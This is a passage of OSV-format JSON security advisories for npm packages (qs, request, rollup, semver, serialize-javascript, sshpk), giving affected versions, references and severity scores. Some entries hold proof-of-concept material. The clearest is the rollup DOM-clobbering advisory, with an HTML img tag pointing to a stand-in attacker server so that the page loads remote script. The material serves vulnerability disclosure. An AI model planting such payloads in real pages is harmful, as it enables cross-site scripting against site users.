"6.5.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.4.0" }, { "fixed": "6.4.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.3.0" }, { "fixed": "6.3.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24999" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/pull/428" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/4310742efbd8c03f6495f07906b45213da0a32ec" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/727ef5d34605108acb3513f72d5435972ed15b68" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/73205259936317b40f447c5cdb71c5b341848e1b" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/8b4cc14cda94a5c89341b77e5fe435ec6c41be2d" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/ba24e74dd17931f825adb52f5633e48293b584e1" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/e799ba57e573a30c14b67c1889c7c04d508b9105" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/ed0f5dcbef4b168a8ae299d78b1e4a2e9b1baf1f" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/f945393cfe442fe8c6e62b4156fd35452c0686ee" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/fc3682776670524a42e19709ec4a8138d0d7afda" }, { "type": "WEB", "url": "https://github.com/expressjs/express/releases/tag/4.17.3" }, { "type": "PACKAGE", "url": "https://github.com/ljharb/qs" }, { "type": "WEB", "url": "https://github.com/n8tz/CVE-2022-24999" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00039.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230908-0005" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-12-06T14:32:46Z", "nvd_published_at": "2022-11-26T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jjv7-qpx3-h62q", "published": "2017-10-24T18:33:36Z", "modified": "2023-11-08T03:57:44.492821Z", "aliases": [ "CVE-2014-7191" ], "summary": "Denial-of-Service Memory Exhaustion in qs", "details": "Versions prior to 1.0 of `qs` are affected by a denial of service condition. This condition is triggered by parsing a crafted string that deserializes into very large sparse arrays, resulting in the process running out of memory and eventually crashing.\n\n\n## Recommendation\n\nUpdate to version 1.0.0 or later.", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-jjv7-qpx3-h62q/GHSA-jjv7-qpx3-h62q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7191" }, { "type": "WEB", "url": "https://github.com/visionmedia/node-querystring/issues/104" }, { "type": "WEB", "url": "https://github.com/raymondfeng/node-querystring/commit/43a604b7847e56bba49d0ce3e222fe89569354d8" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:1380" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96729" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-jjv7-qpx3-h62q" }, { "type": "PACKAGE", "url": "https://github.com/visionmedia/node-querystring" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/29" }, { "type": "WEB", "url": "http://secunia.com/advisories/60026" }, { "type": "WEB", "url": "http://secunia.com/advisories/62170" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685987" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687263" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687928" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:43:41Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-7xfp-9c55-5vqj", "published": "2018-11-09T17:44:01Z", "modified": "2023-11-08T03:59:00.437371Z", "aliases": [ "CVE-2017-16026" ], "summary": "Remote Memory Exposure in request", "details": "Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.\n\n## Proof of Concept\n\n```js\nvar request = require('request');\nvar http = require('http');\n\nvar serveFunction = function (req, res){\n\treq.on('data', function (data) {\n console.log(data)\n });\n\tres.end();\n};\nvar server = http.createServer(serveFunction);\nserver.listen(8000);\n\nrequest({\n\tmethod: \"POST\",\n\turi: 'http://localhost:8000',\n\tmultipart: [{body:500}]\n},function(err,res,body){});\n```\n\n\n## Recommendation\n\nUpdate to version 2.68.0 or later", "affected": [ { "package": { "name": "request", "ecosystem": "npm", "purl": "pkg:npm/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.49.0" }, { "fixed": "2.68.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-7xfp-9c55-5vqj/GHSA-7xfp-9c55-5vqj.json" } }, { "package": { "name": "request", "ecosystem": "npm", "purl": "pkg:npm/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.2.6" }, { "fixed": "2.68.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 2.47.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-7xfp-9c55-5vqj/GHSA-7xfp-9c55-5vqj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16026" }, { "type": "WEB", "url": "https://github.com/request/request/issues/1904" }, { "type": "WEB", "url": "https://github.com/request/request/pull/2018" }, { "type": "WEB", "url": "https://github.com/request/request/pull/2022" }, { "type": "WEB", "url": "https://github.com/request/request/commit/29d81814bc16bc79cb112b4face8be6fc00061dd" }, { "type": "PACKAGE", "url": "https://github.com/request/request" } ], "database_specific": { "cwe_ids": [ "CWE-201" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:23:42Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p8p7-x288-28g6", "published": "2023-03-16T15:30:19Z", "modified": "2024-03-21T17:47:20Z", "aliases": [ "CVE-2023-28155" ], "related": [ "CGA-qqwm-8ppm-96fx", "CGA-rw88-hxpr-jw8v" ], "summary": "Server-Side Request Forgery in Request", "details": "The `request` package through 2.88.2 for Node.js and the `@cypress/request` package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).\n\nNOTE: The `request` package is no longer supported by the maintainer.", "affected": [ { "package": { "name": "request", "ecosystem": "npm", "purl": "pkg:npm/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "2.88.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-p8p7-x288-28g6/GHSA-p8p7-x288-28g6.json" } }, { "package": { "name": "@cypress/request", "ecosystem": "npm", "purl": "pkg:npm/%40cypress/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.88.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-p8p7-x288-28g6/GHSA-p8p7-x288-28g6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28155" }, { "type": "WEB", "url": "https://github.com/request/request/issues/3442" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/pull/28" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/2500" }, { "type": "WEB", "url": "https://github.com/request/request/pull/3444" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/commit/c5bcf21d40fb61feaff21a0e5a2b3934a440024f" }, { "type": "WEB", "url": "https://doyensec.com/resources/Doyensec_Advisory_RequestSSRF_Q12023.pdf" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/blob/master/lib/redirect.js#L116" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/releases/tag/v3.0.0" }, { "type": "PACKAGE", "url": "https://github.com/request/request" }, { "type": "WEB", "url": "https://github.com/request/request/blob/master/lib/redirect.js#L111" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230413-0007" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "github_reviewed": true, "github_reviewed_at": "2023-03-16T18:33:48Z", "nvd_published_at": "2023-03-16T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gcx4-mw62-g8wm", "published": "2024-09-23T22:11:02Z", "modified": "2024-09-26T21:11:53Z", "aliases": [ "CVE-2024-47068" ], "related": [ "CGA-h8jq-gmpr-v5fp", "CGA-w3cq-r6w2-f8xg" ], "summary": "DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", "details": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nIt's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)), which might serve as a good reference.\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n#### Gadget found in `rollup`\n\nWe have identified a DOM Clobbering vulnerability in `rollup` bundled scripts, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`.\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.\n\n```\nvar s = document.createElement('script')\ns.src = import.meta.url + 'extra.js'\ndocument.head.append(s)\n```\n\nThe output `bundle.js` is shown in the following code snippet.\n\n```\n'use strict';\n\nvar _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;\nvar s = document.createElement('script');\ns.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript \u0026\u0026 False \u0026\u0026 _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';\ndocument.head.append(s);\n```\n\nAdding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n \u003ctitle\u003erollup Example\u003c/title\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element starts--!\u003e\n \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element ends--!\u003e\n\u003c/head\u003e\n\u003cscript type=\"module\" crossorigin src=\"bundle.js\"\u003e\u003c/script\u003e\n\u003cbody\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes.\n\n### Patch\n\nPatching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.\n\n```\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =\u003e\n\tgetResolveUrl(\n\t\t`'${escapeId(relativePath)}', ${\n\t\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t\t}document.currentScript \u0026\u0026 document.currentScript.tagName.toUpperCase() === 'SCRIPT' \u0026\u0026 document.currentScript.src || document.baseURI`\n\t);\n```\n\n```\nconst getUrlFromDocument = (chunkId: string, umd = false) =\u003e\n\t`${\n\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t}(${DOCUMENT_CURRENT_SCRIPT} \u0026\u0026 ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' \u0026\u0026${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(\n\t\tchunkId\n\t)}', document.baseURI).href)`;\n```\n", "affected": [ { "package": { "name": "rollup", "ecosystem": "npm", "purl": "pkg:npm/rollup" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.29.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json" } }, { "package": { "name": "rollup", "ecosystem": "npm", "purl": "pkg:npm/rollup" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.22.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json" } }, { "package": { "name": "rollup", "ecosystem": "npm", "purl": "pkg:npm/rollup" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.79.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541" }, { "type": "PACKAGE", "url": "https://github.com/rollup/rollup" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-09-23T22:11:02Z", "nvd_published_at": "2024-09-23T16:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c2qf-rxjj-qqgw", "published": "2023-06-21T06:30:28Z", "modified": "2024-12-06T20:34:31Z", "aliases": [ "CVE-2022-25883" ], "related": [ "CGA-xmx9-rvv8-j9xq" ], "summary": "semver vulnerable to Regular Expression Denial of Service", "details": "Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.", "affected": [ { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.5.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json" } }, { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json" } }, { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.7.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25883" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/pull/564" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/pull/585" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/pull/593" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/commit/2f8fd41487acf380194579ecb6f8b1bbfe116be0" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/commit/717534ee353682f3bcf33e60a8af4292626d4441" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/commit/928e56d21150da0413a3333a3148b20e741a920c" }, { "type": "PACKAGE", "url": "https://github.com/npm/node-semver" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/classes/range.js#L97-L104" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/classes/range.js%23L97-L104" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js#L138" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js#L160" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js%23L138" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js%23L160" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241025-0004" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-SEMVER-3247795" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-06-22T16:52:56Z", "nvd_published_at": "2023-06-21T05:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x6fg-f45m-jf5q", "published": "2017-10-24T18:33:36Z", "modified": "2023-11-08T03:58:03.440077Z", "aliases": [ "CVE-2015-8855" ], "summary": "Regular Expression Denial of Service in semver", "details": "Versions 4.3.1 and earlier of `semver` are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.\n\n\n\n## Recommendation\n\nUpdate to version 4.3.2 or later", "affected": [ { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-x6fg-f45m-jf5q/GHSA-x6fg-f45m-jf5q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8855" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-x6fg-f45m-jf5q" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/31" }, { "type": "WEB", "url": "https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/86957" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:02:25Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-76p7-773f-r4q5", "published": "2025-02-10T18:30:47Z", "modified": "2025-06-05T00:31:18Z", "aliases": [ "CVE-2024-11831" ], "related": [ "CGA-72hf-gjp2-m4hx" ], "summary": "Cross-site Scripting (XSS) in serialize-javascript", "details": "A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.", "affected": [ { "package": { "name": "serialize-javascript", "ecosystem": "npm", "purl": "pkg:npm/serialize-javascript" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11831" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/pull/173" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/commit/7f3ac252d86b802454cb43782820aea2e0f6dc25" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2025:0304" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:1334" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:1468" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:4511" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8059" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8544" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8551" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-11831" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312579" }, { "type": "PACKAGE", "url": "https://github.com/yahoo/serialize-javascript" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2025-02-10T21:19:59Z", "nvd_published_at": "2025-02-10T16:15:37Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h9rv-jmmf-4pgx", "published": "2019-12-05T18:44:37Z", "modified": "2023-11-08T04:01:20.904735Z", "aliases": [ "CVE-2019-16769" ], "related": [ "CVE-2019-16769" ], "summary": "Cross-Site Scripting in serialize-javascript", "details": "Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", "affected": [ { "package": { "name": "serialize-javascript", "ecosystem": "npm", "purl": "pkg:npm/serialize-javascript" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-h9rv-jmmf-4pgx/GHSA-h9rv-jmmf-4pgx.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16769" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-h9rv-jmmf-4pgx" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1426" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:39:51Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hxcc-f52p-wc94", "published": "2020-08-11T17:21:13Z", "modified": "2023-11-08T04:04:03.301649Z", "aliases": [ "CVE-2020-7660" ], "summary": "Insecure serialization leading to RCE in serialize-javascript", "details": "serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function \"deleteFunctions\" within \"index.js\". \n\nAn object such as `{\"foo\": /1\"/, \"bar\": \"a\\\"@__R-\u003cUID\u003e-0__@\"}` was serialized as `{\"foo\": /1\"/, \"bar\": \"a\\/1\"/}`, which allows an attacker to escape the `bar` key. This requires the attacker to control the values of both `foo` and `bar` and guess the value of `\u003cUID\u003e`. The UID has a keyspace of approximately 4 billion making it a realistic network attack.", "affected": [ { "package": { "name": "serialize-javascript", "ecosystem": "npm", "purl": "pkg:npm/serialize-javascript" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-hxcc-f52p-wc94/GHSA-hxcc-f52p-wc94.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7660" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/commit/f21a6fb3ace2353413761e79717b2d210ba6ccbd" }, { "type": "PACKAGE", "url": "https://github.com/yahoo/serialize-javascript" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-08-11T14:14:51Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2m39-62fm-q8r3", "published": "2018-08-15T13:22:23Z", "modified": "2023-11-08T04:00:18.101194Z", "aliases": [ "CVE-2018-3737" ], "summary": "Regular Expression Denial of Service in sshpk", "details": "Versions of `sshpk` before 1.13.2 or 1.14.1 are vulnerable to regular expression denial of service when parsing crafted invalid public keys.\n\n\n## Recommendation\n\nUpdate to version 1.13.2, 1.14.1 or later.", "affected": [ { "package": { "name": "sshpk", "ecosystem": "npm", "purl": "pkg:npm/sshpk" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.13.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-2m39-62fm-q8r3/GHSA-2m39-62fm-q8r3.json" } } ], "references": [ { "type": "ADVISORY", "url": 